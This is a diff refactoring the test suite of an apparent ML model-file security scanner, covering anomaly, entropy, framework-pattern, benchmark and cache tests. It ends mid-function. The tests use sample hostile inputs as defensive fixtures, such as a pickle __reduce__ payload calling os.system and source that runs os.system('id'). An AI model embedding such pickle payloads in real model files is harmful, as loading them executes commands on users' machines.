monkeypatch.setattr(analyzer, "_analyze_ml_context", lambda *_args: {"confidence": 0.1, "reasoning": []}) - monkeypatch.setattr(analyzer, "_analyze_anomalies", lambda *_args: {"confidence": 0.1, "reasoning": []}) - monkeypatch.setattr( - analyzer, - "_analyze_framework_patterns", - lambda *_args: {"confidence": 0.1, "reasoning": []}, - ) - - result = analyzer.analyze_suspicious_pattern("x", "token", context) - - assert result.confidence == pytest.approx(0.1) - assert result.risk_level == "critical" - assert result.is_suspicious is True + _assert_integrated_analysis_safety_confidence(monkeypatch, (0.1), (0.1), (0.1), (0.1), ("critical"), (True)) def test_integrated_analyzer_uses_adjusted_risk_for_suspiciousness( self, @@ -282,3 +227,47 @@ def test_integrated_analyzer_ignores_attacker_controlled_filename_context(self) spoofed = analyzer._analyze_framework_patterns("eval", "code_execution", spoofed_context) assert spoofed == normal + + +def _assert_integrated_analysis_safety_confidence( + monkeypatch: pytest.MonkeyPatch, + case_ml_confidence: float, + case_anomaly_confidence: float, + case_framework_confidence: float, + case_confidence: float, + case_risk_level: str, + case_suspicious: bool, +) -> None: + from modelaudit.analysis import IntegratedAnalyzer + from modelaudit.analysis.unified_context import UnifiedMLContext + + context = UnifiedMLContext(Path("test.pkl"), 1024, "pickle") + analyzer = IntegratedAnalyzer() + monkeypatch.setattr( + analyzer, "_analyze_ml_context", lambda *_args: {"confidence": case_ml_confidence, "reasoning": []} + ) + monkeypatch.setattr( + analyzer, "_analyze_anomalies", lambda *_args: {"confidence": case_anomaly_confidence, "reasoning": []} + ) + monkeypatch.setattr( + analyzer, + "_analyze_framework_patterns", + lambda *_args: {"confidence": case_framework_confidence, "reasoning": []}, + ) + + result = analyzer.analyze_suspicious_pattern("x", "token", context) + + assert result.confidence == pytest.approx(case_confidence) + assert result.risk_level == case_risk_level + assert result.is_suspicious is case_suspicious + + +def _assert_semantic_import_alias_risk(case_source: str, case_call_name: str) -> None: + from modelaudit.analysis import CodeRiskLevel, SemanticAnalyzer + + analyzer = SemanticAnalyzer() + + risk_level, details = analyzer.analyze_code_behavior(case_source, {}) + + assert risk_level != CodeRiskLevel.SAFE + assert case_call_name in details["function_calls"] diff --git a/tests/analysis/test_anomaly_detector.py b/tests/analysis/test_anomaly_detector.py index 554914ebe..515149999 100644 --- a/tests/analysis/test_anomaly_detector.py +++ b/tests/analysis/test_anomaly_detector.py @@ -1,10 +1,27 @@ """Tests for anomaly detector module.""" +from dataclasses import replace +from typing import Any + import pytest from modelaudit.analysis.anomaly_detector import AnomalyDetector, StatisticalProfile +def _block_numpy_import(monkeypatch: pytest.MonkeyPatch, *, include_scipy: bool = False) -> None: + """Block optional numerical imports until the calling test's monkeypatch teardown.""" + import builtins + + real_import = builtins.__import__ + + def mock_import(name: str, *args: Any, **kwargs: Any) -> Any: + if name == "numpy" or (include_scipy and name == "scipy"): + raise ImportError("No module named 'numpy'") + return real_import(name, *args, **kwargs) + + monkeypatch.setattr(builtins, "__import__", mock_import) + + class TestStatisticalProfile: """Tests for StatisticalProfile dataclass.""" @@ -146,18 +163,11 @@ def test_anomaly_thresholds_exist(self, detector): assert "activation_pattern" in detector.anomaly_thresholds assert detector.anomaly_thresholds["weight_distribution"] == 3.0 - def test_compute_statistical_profile_no_numpy(self, detector, monkeypatch): + def test_compute_statistical_profile_no_numpy( + self, detector: AnomalyDetector, monkeypatch: pytest.MonkeyPatch + ) -> None: """Test profile computation falls back gracefully without numpy.""" - import builtins - - real_import = builtins.__import__ - - def mock_import(name, *args, **kwargs): - if name == "numpy" or name == "scipy": - raise ImportError("No module named 'numpy'") - return real_import(name, *args, **kwargs) - - monkeypatch.setattr(builtins, "__import__", mock_import) + _block_numpy_import(monkeypatch, include_scipy=True) # Should return empty profile profile = detector.compute_statistical_profile([1, 2, 3]) @@ -208,8 +218,18 @@ def test_score_to_severity(self, detector): assert detector._score_to_severity(3.5) == "high" assert detector._score_to_severity(6.0) == "critical" - def test_analyze_anomaly_mean_shift(self, detector): - """Test anomaly analysis detects mean shift.""" + @pytest.mark.parametrize( + ("field", "value", "expected_detail"), + [ + pytest.param("mean", 1.0, "mean_shift", id="mean_shift"), + pytest.param("std", 0.5, "variance_change", id="variance_change"), # 5x std change + pytest.param("skewness", 5.0, "skewness", id="high_skewness"), + pytest.param("kurtosis", 20.0, "kurtosis", id="abnormal_kurtosis"), + pytest.param("sparsity", 0.95, "sparsity", id="extreme_sparsity"), + ], + ) + def test_analyze_anomaly(self, detector: AnomalyDetector, field: str, value: float, expected_detail: str) -> None: + """Detect each statistical anomaly against an otherwise identical profile.""" expected = StatisticalProfile( mean=0.0, std=0.1, @@ -222,136 +242,9 @@ def test_analyze_anomaly_mean_shift(self, detector): zero_ratio=0.01, sparsity=0.05, ) - actual = StatisticalProfile( - mean=1.0, - std=0.1, - min_val=-0.5, - max_val=0.5, - percentiles={}, - skewness=0.0, - kurtosis=3.0, - entropy=7.5, - zero_ratio=0.01, - sparsity=0.05, - ) + actual = replace(expected, percentiles={}, **{field: value}) details = detector._analyze_anomaly(expected, actual) - assert "mean_shift" in details - - def test_analyze_anomaly_variance_change(self, detector): - """Test anomaly analysis detects variance change.""" - expected = StatisticalProfile( - mean=0.0, - std=0.1, - min_val=-0.5, - max_val=0.5, - percentiles={}, - skewness=0.0, - kurtosis=3.0, - entropy=7.5, - zero_ratio=0.01, - sparsity=0.05, - ) - actual = StatisticalProfile( - mean=0.0, - std=0.5, - min_val=-0.5, - max_val=0.5, # 5x std change - percentiles={}, - skewness=0.0, - kurtosis=3.0, - entropy=7.5, - zero_ratio=0.01, - sparsity=0.05, - ) - details = detector._analyze_anomaly(expected, actual) - assert "variance_change" in details - - def test_analyze_anomaly_high_skewness(self, detector): - """Test anomaly analysis detects high skewness.""" - expected = StatisticalProfile( - mean=0.0, - std=0.1, - min_val=-0.5, - max_val=0.5, - percentiles={}, - skewness=0.0, - kurtosis=3.0, - entropy=7.5, - zero_ratio=0.01, - sparsity=0.05, - ) - actual = StatisticalProfile( - mean=0.0, - std=0.1, - min_val=-0.5, - max_val=0.5, - percentiles={}, - skewness=5.0, - kurtosis=3.0, # High skewness - entropy=7.5, - zero_ratio=0.01, - sparsity=0.05, - ) - details = detector._analyze_anomaly(expected, actual) - assert "skewness" in details - - def test_analyze_anomaly_abnormal_kurtosis(self, detector): - """Test anomaly analysis detects abnormal kurtosis.""" - expected = StatisticalProfile( - mean=0.0, - std=0.1, - min_val=-0.5, - max_val=0.5, - percentiles={}, - skewness=0.0, - kurtosis=3.0, - entropy=7.5, - zero_ratio=0.01, - sparsity=0.05, - ) - actual = StatisticalProfile( - mean=0.0, - std=0.1, - min_val=-0.5, - max_val=0.5, - percentiles={}, - skewness=0.0, - kurtosis=20.0, # Very high kurtosis - entropy=7.5, - zero_ratio=0.01, - sparsity=0.05, - ) - details = detector._analyze_anomaly(expected, actual) - assert "kurtosis" in details - - def test_analyze_anomaly_extreme_sparsity(self, detector): - """Test anomaly analysis detects extreme sparsity.""" - expected = StatisticalProfile( - mean=0.0, - std=0.1, - min_val=-0.5, - max_val=0.5, - percentiles={}, - skewness=0.0, - kurtosis=3.0, - entropy=7.5, - zero_ratio=0.01, - sparsity=0.05, - ) - actual = StatisticalProfile( - mean=0.0, - std=0.1, - min_val=-0.5, - max_val=0.5, - percentiles={}, - skewness=0.0, - kurtosis=3.0, - entropy=7.5, - zero_ratio=0.01, - sparsity=0.95, # Extremely sparse - ) - details = detector._analyze_anomaly(expected, actual) - assert "sparsity" in details + assert expected_detail in details class TestSuspiciousPatternDetection: @@ -362,63 +255,33 @@ def detector(self): """Create an anomaly detector instance.""" return AnomalyDetector() - def test_check_suspicious_patterns_no_numpy(self, detector, monkeypatch): + def test_check_suspicious_patterns_no_numpy( + self, detector: AnomalyDetector, monkeypatch: pytest.MonkeyPatch + ) -> None: """Test suspicious pattern checking falls back without numpy.""" - import builtins - - real_import = builtins.__import__ - - def mock_import(name, *args, **kwargs): - if name == "numpy": - raise ImportError("No module named 'numpy'") - return real_import(name, *args, **kwargs) - - monkeypatch.setattr(builtins, "__import__", mock_import) + _block_numpy_import(monkeypatch) result = detector._check_suspicious_patterns([1, 2, 3]) assert result == [] - def test_contains_executable_signature_no_numpy(self, detector, monkeypatch): + def test_contains_executable_signature_no_numpy( + self, detector: AnomalyDetector, monkeypatch: pytest.MonkeyPatch + ) -> None: """Test executable signature check without numpy.""" - import builtins - - real_import = builtins.__import__ - - def mock_import(name, *args, **kwargs): - if name == "numpy": - raise ImportError("No module named 'numpy'") - return real_import(name, *args, **kwargs) - - monkeypatch.setattr(builtins, "__import__", mock_import) + _block_numpy_import(monkeypatch) result = detector._contains_executable_signature([1, 2, 3]) assert result is False - def test_contains_encoded_strings_no_numpy(self, detector, monkeypatch): + def test_contains_encoded_strings_no_numpy( + self, detector: AnomalyDetector, monkeypatch: pytest.MonkeyPatch + ) -> None: """Test encoded strings check without numpy.""" - import builtins - - real_import = builtins.__import__ - - def mock_import(name, *args, **kwargs): - if name == "numpy": - raise ImportError("No module named 'numpy'") - return real_import(name, *args, **kwargs) - - monkeypatch.setattr(builtins, "__import__", mock_import) + _block_numpy_import(monkeypatch) result = detector._contains_encoded_strings([1, 2, 3]) assert result is False - def test_has_repeating_patterns_no_numpy(self, detector, monkeypatch): + def test_has_repeating_patterns_no_numpy(self, detector: AnomalyDetector, monkeypatch: pytest.MonkeyPatch) -> None: """Test repeating patterns check without numpy.""" - import builtins - - real_import = builtins.__import__ - - def mock_import(name, *args, **kwargs): - if name == "numpy": - raise ImportError("No module named 'numpy'") - return real_import(name, *args, **kwargs) - - monkeypatch.setattr(builtins, "__import__", mock_import) + _block_numpy_import(monkeypatch) result = detector._has_repeating_patterns([1, 2, 3]) assert result is False @@ -432,18 +295,11 @@ def test_has_repeating_patterns_short_data(self, detector): result = detector._has_repeating_patterns(short_data) assert result is False - def test_violates_distribution_laws_no_numpy(self, detector, monkeypatch): + def test_violates_distribution_laws_no_numpy( + self, detector: AnomalyDetector, monkeypatch: pytest.MonkeyPatch + ) -> None: """Test distribution law check without numpy.""" - import builtins - - real_import = builtins.__import__ - - def mock_import(name, *args, **kwargs): - if name == "numpy": - raise ImportError("No module named 'numpy'") - return real_import(name, *args, **kwargs) - - monkeypatch.setattr(builtins, "__import__", mock_import) + _block_numpy_import(monkeypatch) result = detector._violates_distribution_laws([1, 2, 3]) assert result is False diff --git a/tests/analysis/test_entropy_analyzer.py b/tests/analysis/test_entropy_analyzer.py index 90b0f08fa..73c289b67 100644 --- a/tests/analysis/test_entropy_analyzer.py +++ b/tests/analysis/test_entropy_analyzer.py @@ -232,31 +232,11 @@ def test_skip_for_ml_weights(self, analyzer: EntropyAnalyzer) -> None: def test_exact_dangerous_literal_not_skipped_for_ml_weights(self, analyzer: EntropyAnalyzer) -> None: """Exact dangerous literals must not be suppressed by weight-like entropy.""" - import numpy as np - - np.random.seed(42) - weights = np.random.normal(0, 0.2, 1000).astype(np.float32) - data = weights.tobytes() + b"os.system" - - data_type, confidence = analyzer.classify_data_type(data) - - assert data_type == "ml_weights" - assert confidence > 0.8 - assert analyzer.should_skip_pattern_search(data, b"os.system") is False + _assert_exact_dangerous_weight_literal(analyzer, (b"os.system"), (False)) def test_near_match_literal_still_skipped_for_ml_weights(self, analyzer: EntropyAnalyzer) -> None: """Near-match text should not disable weight-like skip behavior.""" - import numpy as np - - np.random.seed(42) - weights = np.random.normal(0, 0.2, 1000).astype(np.float32) - data = weights.tobytes() + b"os.systemic" - - data_type, confidence = analyzer.classify_data_type(data) - - assert data_type == "ml_weights" - assert confidence > 0.8 - assert analyzer.should_skip_pattern_search(data, b"os.system") is True + _assert_exact_dangerous_weight_literal(analyzer, (b"os.systemic"), (True)) def test_exact_literal_still_skipped_for_random_data(self, analyzer: EntropyAnalyzer) -> None: """Exact literals in random-looking bytes should not bypass random-data suppression.""" @@ -347,3 +327,19 @@ def test_struct_error_handling(self, analyzer): result = analyzer.analyze_float_patterns(data) # Should not raise, should return valid result assert "float_ratio" in result + + +def _assert_exact_dangerous_weight_literal( + analyzer: EntropyAnalyzer, case_pattern: bytes, case_should_skip: bool +) -> None: + import numpy as np + + np.random.seed(42) + weights = np.random.normal(0, 0.2, 1000).astype(np.float32) + data = weights.tobytes() + case_pattern + + data_type, confidence = analyzer.classify_data_type(data) + + assert data_type == "ml_weights" + assert confidence > 0.8 + assert analyzer.should_skip_pattern_search(data, b"os.system") is case_should_skip diff --git a/tests/analysis/test_framework_patterns.py b/tests/analysis/test_framework_patterns.py index 04068eeaa..38821a45a 100644 --- a/tests/analysis/test_framework_patterns.py +++ b/tests/analysis/test_framework_patterns.py @@ -102,6 +102,7 @@ def test_pytorch_torch_load_safe(self, knowledge_base): def test_pytorch_model_eval_safe(self, knowledge_base): """Test model.eval() is recognized as safe.""" + # Test ML operation patterns are recognized. is_safe, _explanation = knowledge_base.is_pattern_safe_in_framework("model.eval()", FrameworkType.PYTORCH, {}) assert is_safe is True @@ -130,11 +131,6 @@ def test_false_positive_variable_names(self, knowledge_base): is_safe, _explanation = knowledge_base.is_pattern_safe_in_framework("eval_metrics", FrameworkType.PYTORCH, {}) assert is_safe is True - def test_ml_operations_model_eval(self, knowledge_base): - """Test ML operation patterns are recognized.""" - is_safe, _explanation = knowledge_base.is_pattern_safe_in_framework("model.eval()", FrameworkType.PYTORCH, {}) - assert is_safe is True - class TestGetFrameworkFromImports: """Tests for get_framework_from_imports method.""" @@ -281,31 +277,11 @@ class TestValidateContext: def test_lambda_with_safe_code(self, knowledge_base): """Test Lambda validation with safe code.""" - pattern = FrameworkPattern( - pattern="Lambda", - pattern_type="layer", - is_safe=False, - context="layer_definition", - risk_level="low", - explanation="Lambda layer", - ) - context = {"lambda_code": "lambda x: x * 0.5", "layer_definition": True} - result = knowledge_base._validate_context(pattern, context) - assert result is True + _assert_lambda_context_validation(knowledge_base, "low", "lambda x: x * 0.5", True) def test_lambda_with_unsafe_code(self, knowledge_base): """Test Lambda validation with unsafe code.""" - pattern = FrameworkPattern( - pattern="Lambda", - pattern_type="layer", - is_safe=False, - context="layer_definition", - risk_level="high", - explanation="Lambda layer", - ) - context = {"lambda_code": "lambda x: eval(x)", "layer_definition": True} - result = knowledge_base._validate_context(pattern, context) - assert result is False + _assert_lambda_context_validation(knowledge_base, "high", "lambda x: eval(x)", False) def test_wrong_context(self, knowledge_base): """Test validation fails with wrong context.""" @@ -320,3 +296,19 @@ def test_wrong_context(self, knowledge_base): context = {"serialization": True} result = knowledge_base._validate_context(pattern, context) assert result is False + + +def _assert_lambda_context_validation( + knowledge_base: FrameworkKnowledgeBase, case_risk_level: str, case_code: str, case_valid: bool +) -> None: + pattern = FrameworkPattern( + pattern="Lambda", + pattern_type="layer", + is_safe=False, + context="layer_definition", + risk_level=case_risk_level, + explanation="Lambda layer", + ) + context = {"lambda_code": case_code, "layer_definition": True} + result = knowledge_base._validate_context(pattern, context) + assert result is case_valid diff --git a/tests/benchmarks/test_picklescan_benchmarks.py b/tests/benchmarks/test_picklescan_benchmarks.py index 85c69bcb5..ca7e6c4e3 100644 --- a/tests/benchmarks/test_picklescan_benchmarks.py +++ b/tests/benchmarks/test_picklescan_benchmarks.py @@ -10,6 +10,8 @@ import pytest from modelaudit_picklescan import PickleScanner, SafetyVerdict, ScanStatus, scan_bytes +from tests.helpers.file_creators import SystemCommandPayload + pytest.importorskip("pytest_benchmark") pytestmark = pytest.mark.performance @@ -18,11 +20,6 @@ WARMUP_ROUNDS = 2 -class MaliciousReduce: - def __reduce__(self) -> tuple[object, tuple[str]]: - return (os.system, ("echo benchmark",)) - - class ChunkedReadStream(io.BytesIO): def __init__(self, payload: bytes, *, max_read_size: int) -> None: super().__init__(payload) @@ -61,7 +58,7 @@ def _build_large_safe_model() -> dict[str, Any]: def standalone_pickle_payloads() -> dict[str, bytes]: safe_small = pickle.dumps({"weights": [1, 2, 3], "metadata": {"format": "pickle"}}, protocol=4) safe_large = pickle.dumps(_build_large_safe_model(), protocol=4) - malicious_reduce = pickle.dumps(MaliciousReduce(), protocol=4) + malicious_reduce = pickle.dumps(SystemCommandPayload("echo benchmark", lambda: os.system), protocol=4) nested_payload = malicious_reduce multi_stream_padded = safe_small + (b"\x00" * 4096) + malicious_reduce diff --git a/tests/benchmarks/test_scan_benchmarks.py b/tests/benchmarks/test_scan_benchmarks.py index 9b48e86b1..cd1240a45 100644 --- a/tests/benchmarks/test_scan_benchmarks.py +++ b/tests/benchmarks/test_scan_benchmarks.py @@ -203,25 +203,11 @@ def test_scan_single_checkpoint_before_load(benchmark: Any, benchmark_inputs: di def test_scan_release_candidate_repository(benchmark: Any, benchmark_inputs: dict[str, Path]) -> None: - result = _benchmark_scan( - benchmark, - benchmark_inputs["release_candidate"], - workload="mixed-model-repository", - ) - - assert result.success is True - assert result.files_scanned >= 3 + _assert_benchmark_scan(benchmark, benchmark_inputs, "release_candidate", "mixed-model-repository", 3) def test_scan_duplicate_registry_snapshot(benchmark: Any, benchmark_inputs: dict[str, Path]) -> None: - result = _benchmark_scan( - benchmark, - benchmark_inputs["registry_snapshot"], - workload="duplicate-heavy-registry", - ) - - assert result.success is True - assert result.files_scanned >= 4 + _assert_benchmark_scan(benchmark, benchmark_inputs, "registry_snapshot", "duplicate-heavy-registry", 4) def test_scan_suspicious_pickle_intake(benchmark: Any, benchmark_inputs: dict[str, Path]) -> None: @@ -287,3 +273,16 @@ def test_rejected_basic_auth_candidates_scan_linearly(benchmark: Any) -> None: ) assert not [finding for finding in findings if finding.get("secret_type") == "Basic Auth Credentials"] + + +def _assert_benchmark_scan( + benchmark: Any, benchmark_inputs: dict[str, Path], case_input_name: str, case_workload: str, case_minimum_files: int +) -> None: + result = _benchmark_scan( + benchmark, + benchmark_inputs[case_input_name], + workload=case_workload, + ) + + assert result.success is True + assert result.files_scanned >= case_minimum_files diff --git a/tests/cache/test_cache_correctness.py b/tests/cache/test_cache_correctness.py index a028c55a2..e80f79ddf 100644 --- a/tests/cache/test_cache_correctness.py +++ b/tests/cache/test_cache_correctness.py @@ -10,6 +10,7 @@ import time import zipfile from collections.abc import Callable, Iterator +from functools import partial from importlib.abc import MetaPathFinder from importlib.machinery import ( BYTECODE_SUFFIXES, @@ -61,6 +62,7 @@ from modelaudit.scanner_results import INCONCLUSIVE_SCAN_OUTCOME, ScanResult from modelaudit.utils.helpers.cache_decorator import cached_scan from modelaudit.utils.repository_context import REPOSITORY_SCAN_ROOT_CONFIG_KEY +from tests.helpers.pickle_framework import _replace_source_after_fstat, _replace_source_on_read @pytest.fixture(autouse=True) @@ -168,6 +170,27 @@ def capture_ancestor_identity(file_path: str) -> AncestorIdentity: monkeypatch.setattr(cache, "_capture_ancestor_identity", capture_ancestor_identity) +def _record_opened_descriptors(opened_descriptors: list[int]) -> Callable[[str, int], int]: + def open_path(_path: str, _flags: int) -> int: + descriptor = 100 + len(opened_descriptors) + opened_descriptors.append(descriptor) + return descriptor + + return open_path + + +def _count_identity_releases(monkeypatch: pytest.MonkeyPatch, cache: ScanResultsCache) -> list[int]: + release_calls = [0] + original_release = cache.release_ancestor_identity + + def release_identity(identity: AncestorIdentity | None) -> None: + release_calls[0] += 1 + original_release(identity) + + monkeypatch.setattr(cache, "release_ancestor_identity", release_identity) + return release_calls + + def test_cache_config_hash_preserves_128_bits(tmp_path: Path) -> None: """Attacker-influenced scan context must not collapse to a short cache identity.""" cache = ScanResultsCache(str(tmp_path / "cache")) @@ -2186,10 +2209,7 @@ def close(self) -> None: opened_descriptors: list[int] = [] closed_descriptors: list[int] = [] - def open_path(_path: str, _flags: int) -> int: - descriptor = 100 + len(opened_descriptors) - opened_descriptors.append(descriptor) - return descriptor + open_path = _record_opened_descriptors(opened_descriptors) monkeypatch.setattr(scan_results_cache_module, "select", select_stub) monkeypatch.setattr(scan_results_cache_module.os, "open", open_path) @@ -2237,10 +2257,7 @@ def close(self) -> None: opened_descriptors: list[int] = [] closed_descriptors: list[int] = [] - def open_path(_path: str, _flags: int) -> int: - descriptor = 100 + len(opened_descriptors) - opened_descriptors.append(descriptor) - return descriptor + open_path = _record_opened_descriptors(opened_descriptors) monkeypatch.setattr(scan_results_cache_module, "select", select_stub) monkeypatch.setattr(scan_results_cache_module.os, "open", open_path) @@ -2294,10 +2311,7 @@ def close(self) -> None: opened_descriptors: list[int] = [] closed_descriptors: list[int] = [] - def open_path(_path: str, _flags: int) -> int: - descriptor = 100 + len(opened_descriptors) - opened_descriptors.append(descriptor) - return descriptor + open_path = _record_opened_descriptors(opened_descriptors) monkeypatch.setattr(scan_results_cache_module, "select", select_stub) monkeypatch.setattr(scan_results_cache_module.os, "open", open_path) @@ -2366,10 +2380,7 @@ def close(self) -> None: opened_descriptors: list[int] = [] closed_descriptors: list[int] = [] - def open_path(_path: str, _flags: int) -> int: - descriptor = 100 + len(opened_descriptors) - opened_descriptors.append(descriptor) - return descriptor + open_path = _record_opened_descriptors(opened_descriptors) monkeypatch.setattr(scan_results_cache_module, "select", _stub_darwin_select(queue)) monkeypatch.setattr(scan_results_cache_module.os, "open", open_path) @@ -2577,11 +2588,7 @@ def test_cached_scan_persists_miss_and_hits_on_second_call(tmp_path: Path) -> No config = {"cache_enabled": True, "cache_dir": str(cache_dir), "timeout": 30} calls = {"count": 0} - @cached_scan() - def scan(path: str, config: dict[str, Any] | None = None) -> dict[str, Any]: - assert config is not None - calls["count"] += 1 - return {"call_count": calls["count"], "timeout": config["timeout"]} + scan = cached_scan()(partial(_count_scan, calls)) first = scan(str(file_path), config) second = scan(str(file_path), config) @@ -2644,22 +2651,7 @@ def test_cache_lookup_rejects_transient_clean_hash_for_malicious_final_bytes( file_path.write_bytes(malicious_payload) os.utime(file_path, ns=(original_stat.st_atime_ns, original_stat.st_mtime_ns)) - original_hash = cache.hasher.hash_file_with_stat - raced = False - - def hash_transient_clean_bytes(path: str, file_stat: os.stat_result) -> str: - nonlocal raced - if raced: - return original_hash(path, file_stat) - raced = True - Path(path).write_bytes(clean_payload) - os.utime(path, ns=(original_stat.st_atime_ns, original_stat.st_mtime_ns)) - clean_hash = original_hash(path, Path(path).stat()) - Path(path).write_bytes(malicious_payload) - os.utime(path, ns=(original_stat.st_atime_ns, original_stat.st_mtime_ns)) - return clean_hash - - monkeypatch.setattr(cache.hasher, "hash_file_with_stat", hash_transient_clean_bytes) + _inject_transient_clean_hash(monkeypatch, cache, clean_payload, malicious_payload, original_stat) assert cache.get_cached_result(str(file_path), version_context=version_context) is None assert file_path.read_bytes() == malicious_payload @@ -3386,11 +3378,7 @@ def test_cached_scan_invalidates_on_material_scan_config_change(tmp_path: Path) cache_dir = tmp_path / "cache" calls = {"count": 0} - @cached_scan() - def scan(path: str, config: dict[str, Any] | None = None) -> dict[str, Any]: - assert config is not None - calls["count"] += 1 - return {"call_count": calls["count"], "timeout": config["timeout"]} + scan = cached_scan()(partial(_count_scan, calls)) base_config = {"cache_enabled": True, "cache_dir": str(cache_dir), "timeout": 30} changed_config = {**base_config, "timeout": 5} @@ -4589,19 +4577,7 @@ def test_source_fingerprint_rejects_path_replacement_during_read( malicious_source = b"import os\nos.system('id')\n" replacement_path.write_bytes(malicious_source) displaced_path = tmp_path / "displaced.py" - original_read = os.read - replaced = False - - def replace_after_first_read(file_descriptor: int, size: int) -> bytes: - nonlocal replaced - chunk = original_read(file_descriptor, size) - if chunk and not replaced: - replaced = True - source_path.rename(displaced_path) - replacement_path.rename(source_path) - return chunk - - monkeypatch.setattr(os, "read", replace_after_first_read) + _replace_source_on_read(monkeypatch, source_path, displaced_path, replacement_path) with pytest.raises(ValueError, match="changed while being read"): ScanResultsCache._bounded_source_fingerprint(source_path) @@ -4620,19 +4596,7 @@ def test_read_fingerprint_rejects_path_replacement_during_read( malicious_source = b"malicious bytecode" replacement_path.write_bytes(malicious_source) displaced_path = tmp_path / "displaced.pyc" - original_read = os.read - replaced = False - - def replace_after_first_read(file_descriptor: int, size: int) -> bytes: - nonlocal replaced - chunk = original_read(file_descriptor, size) - if chunk and not replaced: - replaced = True - source_path.rename(displaced_path) - replacement_path.rename(source_path) - return chunk - - monkeypatch.setattr(os, "read", replace_after_first_read) + _replace_source_on_read(monkeypatch, source_path, displaced_path, replacement_path) with pytest.raises(ValueError, match="changed while being read"): ScanResultsCache._bounded_read_fingerprint(source_path, 64 * 1024, True) @@ -4650,19 +4614,7 @@ def test_extension_fingerprint_rejects_path_replacement_during_validation( replacement_path = tmp_path / f"replacement{EXTENSION_SUFFIXES[0]}" replacement_path.write_bytes(b"malicious extension") displaced_path = tmp_path / f"displaced{EXTENSION_SUFFIXES[0]}" - original_fstat = os.fstat - fstat_calls = 0 - - def replace_after_second_fstat(file_descriptor: int) -> os.stat_result: - nonlocal fstat_calls - file_stat = original_fstat(file_descriptor) - fstat_calls += 1 - if fstat_calls == 2: - extension_path.rename(displaced_path) - replacement_path.rename(extension_path) - return file_stat - - monkeypatch.setattr(os, "fstat", replace_after_second_fstat) + _replace_source_after_fstat(monkeypatch, extension_path, displaced_path, replacement_path) with pytest.raises(ValueError, match="changed while being read"): ScanResultsCache._bounded_source_fingerprint(extension_path) @@ -5542,15 +5494,7 @@ def get_cached_result_with_identity(*_args: Any, **_kwargs: Any) -> tuple[dict[s return None, pre_scan_identity monkeypatch.setattr(cache_manager, "get_cached_result_with_identity", get_cached_result_with_identity) - release_calls = 0 - original_release = cache_manager.cache.release_ancestor_identity - - def release_identity(identity: AncestorIdentity | None) -> None: - nonlocal release_calls - release_calls += 1 - original_release(identity) - - monkeypatch.setattr(cache_manager.cache, "release_ancestor_identity", release_identity) + release_calls = _count_identity_releases(monkeypatch, cache_manager.cache) class UnserializableFailedResult(ScanResult): def to_dict(self, *, include_private_metadata: bool = False) -> dict[str, Any]: @@ -5567,7 +5511,7 @@ def scan(path: str, config: dict[str, Any] | None = None) -> ScanResult: assert isinstance(result, ScanResult) assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME assert cache_manager.get_stats()["total_entries"] == 0 - assert release_calls == 1 + assert release_calls[0] == 1 def test_cached_scan_skips_persisting_scan_timed_out_messages( @@ -5586,15 +5530,7 @@ def get_cached_result_with_identity(*_args: Any, **_kwargs: Any) -> tuple[dict[s return None, pre_scan_identities.pop(0) monkeypatch.setattr(cache_manager, "get_cached_result_with_identity", get_cached_result_with_identity) - release_calls = 0 - original_release = cache_manager.cache.release_ancestor_identity - - def release_identity(identity: AncestorIdentity | None) -> None: - nonlocal release_calls - release_calls += 1 - original_release(identity) - - monkeypatch.setattr(cache_manager.cache, "release_ancestor_identity", release_identity) + release_calls = _count_identity_releases(monkeypatch, cache_manager.cache) @cached_scan() def scan(path: str, config: dict[str, Any] | None = None) -> dict[str, Any]: @@ -5613,108 +5549,25 @@ def scan(path: str, config: dict[str, Any] | None = None) -> dict[str, Any]: assert calls["count"] == 2 assert pre_scan_identities == [] assert cache_manager.get_stats()["total_entries"] == 0 - assert release_calls == 2 + assert release_calls[0] == 2 def test_cached_scan_skips_persisting_package_not_installed_messages(tmp_path: Path) -> None: - file_path = _make_cacheable_file(tmp_path) - cache_dir = tmp_path / "cache" - config = {"cache_enabled": True, "cache_dir": str(cache_dir)} - calls = {"count": 0} - - @cached_scan() - def scan(path: str, config: dict[str, Any] | None = None) -> dict[str, Any]: - calls["count"] += 1 - return { - "checks": [ - { - "message": "paddlepaddle package not installed. Install with 'pip install paddlepaddle'", - "status": "failed", - } - ], - "issues": [], - "scan_count": calls["count"], - } - - first = scan(str(file_path), config) - second = scan(str(file_path), config) - - assert first["scan_count"] == 1 - assert second["scan_count"] == 2 - assert calls["count"] == 2 - assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 + _assert_uncached_missing_package( + tmp_path, "paddlepaddle package not installed. Install with 'pip install paddlepaddle'" + ) def test_cached_scan_skips_persisting_os_level_errors(tmp_path: Path) -> None: - file_path = _make_cacheable_file(tmp_path) - cache_dir = tmp_path / "cache" - config = {"cache_enabled": True, "cache_dir": str(cache_dir)} - calls = {"count": 0} - - @cached_scan() - def scan(path: str, config: dict[str, Any] | None = None) -> dict[str, Any]: - calls["count"] += 1 - return { - "checks": [], - "issues": [{"message": "No such file or directory while opening sidecar", "severity": "warning"}], - "scan_count": calls["count"], - } - - first = scan(str(file_path), config) - second = scan(str(file_path), config) - - assert first["scan_count"] == 1 - assert second["scan_count"] == 2 - assert calls["count"] == 2 - assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 + _assert_uncached_os_error(tmp_path, "No such file or directory while opening sidecar") def test_cached_scan_skips_persisting_scanning_error_messages(tmp_path: Path) -> None: - file_path = _make_cacheable_file(tmp_path) - cache_dir = tmp_path / "cache" - config = {"cache_enabled": True, "cache_dir": str(cache_dir)} - calls = {"count": 0} - - @cached_scan() - def scan(path: str, config: dict[str, Any] | None = None) -> dict[str, Any]: - calls["count"] += 1 - return { - "checks": [], - "issues": [{"message": "Scanning error: failed to read shard 0", "severity": "warning"}], - "scan_count": calls["count"], - } - - first = scan(str(file_path), config) - second = scan(str(file_path), config) - - assert first["scan_count"] == 1 - assert second["scan_count"] == 2 - assert calls["count"] == 2 - assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 + _assert_uncached_os_error(tmp_path, "Scanning error: failed to read shard 0") def test_cached_scan_skips_persisting_memory_mapped_scan_errors(tmp_path: Path) -> None: - file_path = _make_cacheable_file(tmp_path) - cache_dir = tmp_path / "cache" - config = {"cache_enabled": True, "cache_dir": str(cache_dir)} - calls = {"count": 0} - - @cached_scan() - def scan(path: str, config: dict[str, Any] | None = None) -> dict[str, Any]: - calls["count"] += 1 - return { - "checks": [{"message": "Memory-mapped scan error: invalid mapping", 